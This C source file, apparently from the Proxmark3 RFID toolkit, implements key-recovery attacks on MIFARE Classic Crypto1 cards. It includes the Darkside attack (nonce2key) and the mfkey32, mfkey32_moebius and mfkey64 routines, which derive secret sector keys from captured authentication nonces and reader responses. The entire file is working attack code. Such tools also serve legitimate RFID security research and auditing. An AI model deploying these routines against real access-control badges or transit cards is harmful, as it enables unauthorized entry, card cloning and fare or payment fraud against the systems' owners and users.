//-----------------------------------------------------------------------------
// Merlok - June 2011
// Roel - Dec 2009
// Unknown author
//
// This code is licensed to you under the terms of the GNU GPL, version 2 or,
// at your option, any later version. See the LICENSE.txt file for the text of
// the license.
//-----------------------------------------------------------------------------
// MIFARE Darkside hack
//-----------------------------------------------------------------------------
#include "mfkey.h"

#include "crapto1/crapto1.h"

// MIFARE
int compare_uint64(const void *a, const void *b) {
    if (*(uint64_t *)b == *(uint64_t *)a) return 0;
    if (*(uint64_t *)b < * (uint64_t *)a) return 1;
    return -1;
}

// create the intersection (common members) of two sorted lists. Lists are terminated by -1. Result will be in list1. Number of elements is returned.
uint32_t intersection(uint64_t *listA, uint64_t *listB) {
    if (listA == NULL || listB == NULL)
        return 0;

    uint64_t *p1, *p2, *p3;
    p1 = p3 = listA;
    p2 = listB;

    while (*p1 != UINT64_C(-1) && *p2 != UINT64_C(-1)) {
        if (compare_uint64(p1, p2) == 0) {
            *p3++ = *p1++;
            p2++;
        } else {
            while (compare_uint64(p1, p2) < 0) ++p1;
            while (compare_uint64(p1, p2) > 0) ++p2;
        }
    }
    *p3 = UINT64_C(-1);
    return p3 - listA;
}

// Darkside attack (hf mf mifare)
// if successful it will return a list of keys, not just one.
uint32_t nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint32_t ar, uint64_t par_info, uint64_t ks_info, uint64_t **keys) {
    struct Crypto1State *states;
    uint32_t i, pos;
    uint8_t ks3x[8], par[8][8];
    uint64_t key_recovered;
    uint64_t *keylist;

    // Reset the last three significant bits of the reader nonce
    nr &= 0xFFFFFF1F;

    for (pos = 0; pos < 8; pos++) {
        ks3x[7 - pos] = (ks_info >> (pos * 8)) & 0x0F;
        uint8_t bt = (par_info >> (pos * 8)) & 0xFF;

        par[7 - pos][0] = (bt >> 0) & 1;
        par[7 - pos][1] = (bt >> 1) & 1;
        par[7 - pos][2] = (bt >> 2) & 1;
        par[7 - pos][3] = (bt >> 3) & 1;
        par[7 - pos][4] = (bt >> 4) & 1;
        par[7 - pos][5] = (bt >> 5) & 1;
        par[7 - pos][6] = (bt >> 6) & 1;
        par[7 - pos][7] = (bt >> 7) & 1;
    }

    states = lfsr_common_prefix(nr, ar, ks3x, par, (par_info == 0));

    if (!states) {
        *keys = NULL;
        return 0;
    }

    keylist = (uint64_t *)states;

    for (i = 0; keylist[i]; i++) {
        lfsr_rollback_word(states + i, uid ^ nt, 0);
        crypto1_get_lfsr(states + i, &key_recovered);
        keylist[i] = key_recovered;
    }
    keylist[i] = -1;

    *keys = keylist;
    return i;
}

// recover key from 2 different reader responses on same tag challenge
bool mfkey32(nonces_t data, uint64_t *outputkey) {
    struct Crypto1State *s, *t;
    uint64_t outkey = 0;
    uint64_t key = 0;     // recovered key
    bool isSuccess = false;
    uint8_t counter = 0;

    uint32_t p640 = prng_successor(data.nonce, 64);

    s = lfsr_recovery32(data.ar ^ p640, 0);

    for (t = s; t->odd | t->even; ++t) {
        lfsr_rollback_word(t, 0, 0);
        lfsr_rollback_word(t, data.nr, 1);
        lfsr_rollback_word(t, data.cuid ^ data.nonce, 0);
        crypto1_get_lfsr(t, &key);
        crypto1_word(t, data.cuid ^ data.nonce, 0);
        crypto1_word(t, data.nr2, 1);
        if (data.ar2 == (crypto1_word(t, 0, 0) ^ p640)) {
            outkey = key;
            counter++;
            if (counter == 20) break;
        }
    }
    isSuccess = (counter == 1);
    *outputkey = (isSuccess) ? outkey : 0;
    crypto1_destroy(s);
    return isSuccess;
}

// recover key from 2 reader responses on 2 different tag challenges
// skip "several found keys".  Only return true if ONE key is found
bool mfkey32_moebius(nonces_t data, uint64_t *outputkey) {
    struct Crypto1State *s, *t;
    uint64_t outkey  = 0;
    uint64_t key     = 0; // recovered key
    bool isSuccess = false;
    int counter = 0;
    uint32_t p640 = prng_successor(data.nonce, 64);
    uint32_t p641 = prng_successor(data.nonce2, 64);

    s = lfsr_recovery32(data.ar ^ p640, 0);

    for (t = s; t->odd | t->even; ++t) {
        lfsr_rollback_word(t, 0, 0);
        lfsr_rollback_word(t, data.nr, 1);
        lfsr_rollback_word(t, data.cuid ^ data.nonce, 0);
        crypto1_get_lfsr(t, &key);

        crypto1_word(t, data.cuid ^ data.nonce2, 0);
        crypto1_word(t, data.nr2, 1);
        if (data.ar2 == (crypto1_word(t, 0, 0) ^ p641)) {
            outkey = key;
            ++counter;
            if (counter == 20) break;
        }
    }
    isSuccess  = (counter == 1);
    *outputkey = (isSuccess) ? outkey : 0;
    crypto1_destroy(s);
    return isSuccess;
}

// recover key from reader response and tag response of one authentication sequence
int mfkey64(nonces_t data, uint64_t *outputkey) {
    uint64_t key = 0;  // recovered key
    uint32_t ks2;      // keystream used to encrypt reader response
    uint32_t ks3;      // keystream used to encrypt tag response
    struct Crypto1State *revstate;

    // Extract the keystream from the messages
    ks2 = data.ar ^ prng_successor(data.nonce, 64);
    ks3 = data.at ^ prng_successor(data.nonce, 96);
    revstate = lfsr_recovery64(ks2, ks3);
    lfsr_rollback_word(revstate, 0, 0);
    lfsr_rollback_word(revstate, 0, 0);
    lfsr_rollback_word(revstate, data.nr, 1);
    lfsr_rollback_word(revstate, data.cuid ^ data.nonce, 0);
    crypto1_get_lfsr(revstate, &key);
    crypto1_destroy(revstate);
    *outputkey = key;
    return 0;
}